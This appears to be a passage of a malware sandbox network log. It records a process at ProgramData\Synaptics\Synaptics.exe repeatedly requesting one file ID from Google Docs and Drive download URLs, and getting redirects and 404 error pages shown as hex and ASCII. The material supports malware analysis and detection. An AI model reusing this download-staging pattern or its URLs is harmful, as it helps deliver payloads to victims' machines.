                                                                                                                              2024-12-30 10:48:21 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:21 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 47 44 38 35 66 4c 48 35 67 30 7a 39 67 68 5f 75 7a 35 48 56 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="oGD85fLH5g0z9gh_uz5HVA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:21 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              70192.168.2.449854142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:21 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:22 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-3uHwHbiK5izA7iI_jFDJnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              71192.168.2.449855142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:21 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:22 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ZA00NfhgUVdxNA6yLlSA9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              72192.168.2.449856142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              73192.168.2.449858142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              74192.168.2.449860142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:23 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6DtdxX0HfGqBdN9JQdf5u6pGQP-mtFSD6oBkzwRl2ljJt7iMuBmyKFGM1wcuCWcvNg
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:23 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-w-TeeP7x87waurlIzFWmAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:23 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:23 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 48 6b 2d 63 6b 50 6e 41 64 4e 36 4d 59 5a 74 69 4c 30 6b 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="bHk-ckPnAdN6MYZtiL0kRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:23 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              75192.168.2.449862142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:22 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:23 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-_sejdNcIsJ21ofiSblvC_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              76192.168.2.449861142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:23 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-sos0cLCGnwRLRoD5JecKVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              77192.168.2.449866142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-BDn8X0biUb3hr7_HG2gh9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              78192.168.2.449865142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:24 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5n0G5tNyIX3etzRQQgrbRvY6n3oGyNqiAR4bMD0n6QlxQudw4ZmGjzUdp7tGD-jhWT2ue_zlk
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lUWRLMMzJ9ivwSm7dh8XFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:24 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:24 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 76 4f 6e 4f 66 4f 48 47 37 41 68 66 50 41 33 2d 4f 59 41 47 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="_vOnOfOHG7AhfPA3-OYAGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
